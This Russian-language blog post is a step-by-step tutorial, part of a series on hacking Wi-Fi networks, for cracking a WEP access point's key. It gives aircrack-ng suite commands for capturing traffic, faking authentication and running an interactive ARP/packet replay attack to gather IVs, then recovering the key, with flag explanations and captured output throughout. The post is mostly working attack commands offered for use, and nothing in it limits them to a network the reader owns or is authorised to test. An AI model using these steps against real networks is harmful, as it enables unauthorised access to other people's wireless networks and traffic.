Всем привет!
Цикл статей по анализу и взлому wi-fi сетей продолжается. Сегодня покажу вам еще один метод взлома.
Первое, что делаем переводим интерфейс в режим монитора (monitor mode), как это делается читайте в статье “
Взлом Wi-Fi сети – часть 1“.
Просматриваем wi-fi сети в радиусе действия.
Теперь настроимся на нашу wi-fi сеть.
Код:
|
# airodump-ng -c 1 -w wep_0841 --bssid 00:22:B0:BE:75:3D mon0 |
- -c – номер канала
- -w – название дамп-файла
- –bssid – MAC-адрес точки доступа
Далее производим фиктивную аутентификацию –
Fake authentication.
Код:
|
# aireplay-ng -1 0 -a 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0 |
- -1 – фиктивная аутентификация
- 0 – реассоциация времени (сек.)
- -a – MAC-адрес точки доступа
- -h – MAC-адрес клиента, который используем
Код:
|
14:21:29 Waiting for beacon frame (BSSID: 00:22:B0:BE:75:3D) on channel 1
14:21:29 Sending Authentication Request (Open System) [ACK]
14:21:29 Authentication successful
14:21:29 Sending Association Request
14:21:34 Sending Authentication Request (Open System)
14:21:36 Sending Authentication Request (Open System)
14:21:38 Sending Authentication Request (Open System)
14:21:40 Sending Authentication Request (Open System)
14:21:42 Sending Authentication Request (Open System) [ACK]
14:21:42 Authentication successful
14:21:42 Sending Association Request [ACK]
14:21:42 Association successful :-) (AID: 1) |
Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.
Далее используем
Interactive packet replay (интерактивная генерация пакетов).
Код:
|
# aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:22:B0:BE:75:3D -h 00:C0:CA:30:85:7A mon0 |
- -2 – interactive replay attack
- -p 0841 – устанавливается Frame Control Field пакет, точно такой же, какой wi-fi клиент, в самом начале, отправляет точке доступа (AP)
- -c FF:FF:FF:FF:FF:FF – MAC-адрес становится широковещательным (помогает получать новые IV – вектора инициализации)
- -b – MAC-адрес точки доступа
- -h – MAC-адрес нашего wi-fi клиента
Код:
|
Read 21 packets...
Size: 139, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:22:B0:BE:75:3D
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:C0:CA:30:85:7A
0x0000: 0842 0000 ffff ffff ffff 0022 b0be 753d .B........."..u=
0x0010: 00c0 ca30 857a 70ca 67aa 3500 4870 5b18 ...0.zp.g.5.Hp[.
0x0020: 9494 adae 329f a896 7eb3 e9c1 2db9 b151 ....2...~...-..Q
0x0030: 7f99 85eb 8d06 b6f6 6bc6 c651 3773 199c .......k..Q7s..
0x0040: f4fe baff a285 5691 d915 8068 f6f0 ea4a ......V....h...J
0x0050: 057e 98c0 ae1a 89a7 c06e 5d0e 6538 2d84 .~.......n].e8-.
0x0060: 7105 5018 799e 56b7 78eb 7b58 9de3 5ca8 q.P.y.V.x.{X..\.
0x0070: 84bb 084c 4dad 6c1b cf74 987a 9250 3671 ...LM.l..t.z.P6q
0x0080: 7ae9 4ce7 509f bdbb 6ebb f4 z.L.P...n..
Use this packet ? y
Saving chosen packet in replay_src-1223-142806.cap
You should also start airodump-ng to capture replies.
351942 packets...(499 pps) |
Когда накопится достаточное количество Data-пакетов, производим их расшифровку.
Код:
|
# aircrack-ng -a 1 -0 wep_0841.cap |
- -a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
- 1 – WEP
- -0 – использовать цвет
Вот и все. Если возникнут вопросы, обращайтесь.
Дополнительные материалы: